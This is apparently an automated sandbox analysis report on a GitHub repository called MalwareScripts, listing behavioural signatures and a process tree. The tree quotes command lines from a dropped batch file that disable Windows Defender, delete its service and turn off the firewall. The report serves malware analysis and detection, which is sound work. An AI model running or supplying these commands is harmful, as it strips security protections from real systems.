Analysis Overview
Threat Level: Likely malicious
The file https://github.com/SantiagoPujana/MalwareScripts was found to be: Likely malicious.
Malicious Activity Summary
Modifies Windows Firewall
Downloads MZ/PE file
Stops running service(s)
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Launches sc.exe
System Location Discovery: System Language Discovery
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Modifies registry key
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-17 08:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-17 08:52
Reported
2024-11-17 08:55
Platform
win10v2004-20241007-en
Max time kernel
127s
Max time network
128s
Command Line
Signatures
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\ScreenMelter.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\FullMemory.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\ScreenMelter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\FullMemory.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133763071872342857" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/SantiagoPujana/MalwareScripts
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xd4,0x110,0x7ffafe10cc40,0x7ffafe10cc4c,0x7ffafe10cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1880,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2460 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2144,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2572 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4680,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3756 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4828,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4512 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3868,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4936,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5408 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5008,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5436 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5248,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4980 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5260,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5360 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5300,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\ScreenMelter.exe
"C:\Users\Admin\Desktop\ScreenMelter.exe"
C:\Users\Admin\Desktop\FullMemory.exe
"C:\Users\Admin\Desktop\FullMemory.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\win64.bat" "
C:\Windows\system32\reg.exe
reg add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\Security /f
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Restart-Service -Name WinDefend -Confirm:$false -Force
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc query WinDefend
C:\Windows\system32\sc.exe
sc delete WinDefend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-NetFirewallProfile -Enabled False
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=disable
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5104,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5140 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=980,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:8
Network
Files